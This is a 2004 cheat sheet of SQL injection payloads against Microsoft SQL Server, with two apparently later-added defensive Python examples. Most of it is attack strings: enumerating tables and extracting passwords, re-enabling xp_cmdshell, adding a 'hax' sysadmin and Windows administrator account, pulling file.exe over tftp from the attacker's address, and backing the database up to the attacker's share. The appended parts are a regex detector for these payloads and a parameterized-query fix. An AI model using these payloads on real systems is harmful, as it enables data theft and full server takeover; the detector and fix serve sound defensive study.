SQL injection summary

Author: SWAP
Category: Vulnerability database
Release date: 2004-06-28 12:31:03
Total browsing: 57

SQL injection summary (from the early ' or '1'='1 onward)

The most important table names (select * from sysobjects): sysobjects, ncsysobjects, sysindexes, tsysindexes, syscolumns, systypes, sysusers, sysdatabases, sysxlogins, sysprocesses.

The most important user names (present by default in an SQL Server database): PUBLIC, DBO, GUEST (generally disabled, or without permissions), db_securityadmin, db_ddladmin.

-----------------------------
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME not in ('login_id')--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME not in ('login_id','login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name='Rahul'--

Constructed statements:

Query whether xp_cmdshell exists:
and 1=(select @@VERSION)
and 'sa'=(select system_user)
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')   (the same check in URL-encoded form)
and 1=(select is_srvrolemember('sysadmin'))   judges whether the login has SA (sysadmin) authority
and 1=(select name from master.dbo.sysdatabases where dbid=7)   gets the database name (dbid 1 to 5 are the system databases; 6 and above are the ones to judge)
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... to get more database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u')

Assume here that the table admin has been obtained. To get the other tables:
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('admin'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))   determines the id value; assume it is 18779569 (uid = id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)   gets one field of admin, assume user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))   gets the other fields
and 0<(select user_id from bbs.dbo.admin where username>1)
In this way the password can be obtained in turn.

Assume that there are fields user_id, username, password and so on.
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')   gets a table name
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='u' and name not in ('address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='u' and name='admin' and uid>(str(id)))   determines the id value
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)   all fields

Traditional xp_cmdshell test procedure:
;exec master.dbo.sp_addlogin hax;--
;exec master.dbo.sp_password null,hax,hax;--
;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
;exec master.dbo.xp_cmdshell 'net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
http://localhost/show.asp?id=1';exec master..xp_cmdshell 'tftp -i youip get file.exe'--
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
declare @a; set @a=db_name(); backup database @a to disk='\\your IP\your shared directory\bak.dat'
If it is restricted, the forms above can be used.
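As an added defender-side example (not part of the original summary): a small classifier that URL-decodes web request lines and flags the payload families listed on this page, namely xp_cmdshell and extended-procedure use, login manipulation (sp_addlogin and friends), schema enumeration through sysobjects/syscolumns/INFORMATION_SCHEMA, server fingerprinting (@@version, is_srvrolemember), the ' or '1'='1 tautology, and the tftp fetch. The request lines are constructed; the family names and regexes are my own.

```python
import re
from urllib.parse import unquote

# Indicator families taken from the payloads listed on this page (SQL Server 2000 era T-SQL).
PATTERNS = {
    "exec_xp_cmdshell": re.compile(
        r"xp_cmdshell|sp_addextendedproc|xp_servicecontrol|openrowset", re.I),
    "login_manipulation": re.compile(
        r"sp_addlogin|sp_password|sp_addsrvrolemember", re.I),
    "schema_enumeration": re.compile(
        r"sysobjects|syscolumns|sysdatabases|information_schema\.|col_name\s*\(|object_id\s*\(", re.I),
    "fingerprint": re.compile(r"@@version|system_user|is_srvrolemember", re.I),
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'|\bor\s+1\s*=\s*1\b", re.I),
    "outbound_fetch": re.compile(r"\btftp\s+-i\b", re.I),
}


def classify(request_line):
    """Return the sorted indicator families found in one raw request line."""
    # The page shows payloads in %20-encoded form, so decode before matching.
    decoded = unquote(request_line)
    # Collapse the 'xp_'+'cmdshell' split shown on the page so the joined name is visible.
    joined = re.sub(r"'\s*\+\s*'", "", decoded)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(joined))


def scan(lines):
    """(index, families) for every line that triggers at least one family."""
    hits = []
    for i, line in enumerate(lines):
        found = classify(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample request lines, not taken from any real log.
SAMPLE = [
    "GET /show.asp?id=1 HTTP/1.1",
    "GET /show.asp?id=1%20and%201=(select%20@@VERSION) HTTP/1.1",
    "GET /show.asp?id=1';exec%20master..xp_cmdshell%20'tftp%20-i%20youip%20get%20file.exe'-- HTTP/1.1",
    "GET /list.asp?class=series'%20and%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='u')>0%20and%20''=' HTTP/1.1",
    "GET /login.asp?user=a'%20or%20'1'='1 HTTP/1.1",
]

if __name__ == "__main__":
    for idx, families in scan(SAMPLE):
        print(idx, families, SAMPLE[idx])
```

Matching runs on the decoded line, so the `%20`-encoded variant of the xp_cmdshell check on this page is caught as well as the plain one.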

select * from openrowset('sqloledb','server';'sa';'','select '''' exec master.dbo.sp_addlogin hax')

Traditional query construction: select * from news where id=.. and topic=... and .....

admin' and (select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>'
select 123;--
;use master;--
:a' or name like 'fff%';--   shows a user named ffff
' and 1<>(... [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
Description: the statement above takes the first user table in the database and puts its name into the email field of the ffff user.

By viewing the ffff user you can get the first table, called ad, and then get the id of this table from the table name ad:
fff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='fff';--
Next, get the name of the second table:
fff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='fff';--
fff';update [users] set email=(select top 1 count(id) from password) where name='fff';--
fff';update [users] set email=(select top 1 pwd from password where id=2) where name='fff';--
fff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'
sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll'   an extended stored procedure can be registered and then called in the general way: exec xp_webserver. Once it has been executed it can be removed: sp_dropextendedproc 'xp_webserver'
insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xfff)--
insert into users values(667,123,123,0xfff)--
insert into users values(123,'admin''--','password',0xfff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0   for an Access database

-----------------------------
Some usual injections:

(a) id=49. The parameter of this kind of injection is numeric, and the SQL statement is roughly:
    select * from <table name> where <field>=49
The injection parameter is id=49 and [query condition], that is, the generated statement is:
    select * from <table name> where <field>=49 and [query condition]

(b) class=series. The injection parameter is a character type, and the SQL statement is roughly:
    select * from <table name> where <field>='series'
The injection parameter is class=series' and [query condition] and ''=', that is, the generated statement is:
    select * from <table name> where <field>='series' and [query condition] and ''=''

(c) Parameters that are not filtered, such as keyword=keywords. The SQL statement is roughly:
    select * from <table name> where <field> like '%keywords%'
The injection parameter is keyword=' and [query condition] and '%25'=', that is, the generated statement is:
    select * from <table name> where <field> like '%' and [query condition] and '%'=''

;and (select top 1 name from sysobjects where xtype='u' and status>0)>0
sysobjects is a system table of SQL Server that stores all table names, views, constraints and other objects; xtype='u' and status>0 indicates a table created by the user. The statement above takes the table name out and compares it with 0, so that the error message exposes the table name.

;and (select top 1 col_name(object_id('<table name>'),1) from sysobjects)>0
After the table name has been obtained with the statement above, object_id('<table name>') gets the table's internal id, and col_name(<table id>,1) represents the first field name of the table; replace 1 with 2, 3, 4 ... to get the field names of the specified table one by one.

POST.HTM content: it is mainly there for convenient input.
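As an added example (not part of the original summary), the three query shapes (a), (b) and (c) built by string concatenation, beside the same queries with bound parameters. It uses an in-memory SQLite table named news with constructed rows standing in for the page's "<table name>"; the page's own or '1'='1 style inputs collapse the WHERE clause in the concatenated form and are treated as plain data in the parameterized one.

```python
import sqlite3

# Constructed rows standing in for the page's "<table name>" with a numeric,
# a character and a free-text field (the (a), (b) and (c) shapes).
ROWS = [(49, "series", "hello world"), (50, "other", "some keywords here"), (51, "series", "nothing")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("create table news (id integer, class text, body text)")
    con.executemany("insert into news values (?, ?, ?)", ROWS)
    return con


def vulnerable(con, kind, value):
    """Builds the query by string concatenation, exactly as the three shapes describe."""
    if kind == "numeric":            # (a)  where field = 49
        sql = "select id from news where id = " + str(value)
    elif kind == "string":           # (b)  where field = 'series'
        sql = "select id from news where class = '" + value + "'"
    else:                            # (c)  where field like '%keywords%'
        sql = "select id from news where body like '%" + value + "%'"
    return sorted(r[0] for r in con.execute(sql))


def hardened(con, kind, value):
    """Same three shapes with bound parameters: the input can only ever be data."""
    if kind == "numeric":
        try:
            num = int(value)         # reject anything that is not a plain integer
        except ValueError:
            return []
        rows = con.execute("select id from news where id = ?", (num,))
    elif kind == "string":
        rows = con.execute("select id from news where class = ?", (value,))
    else:
        # The wildcards belong to the pattern; the user input is bound as a literal.
        rows = con.execute("select id from news where body like ?", ("%" + value + "%",))
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    for kind, payload in (("numeric", "49 or 1=1"), ("string", "series' or ''='"), ("like", "' or '%'='")):
        print(kind, "vulnerable:", vulnerable(db, kind, payload), "hardened:", hardened(db, kind, payload))
```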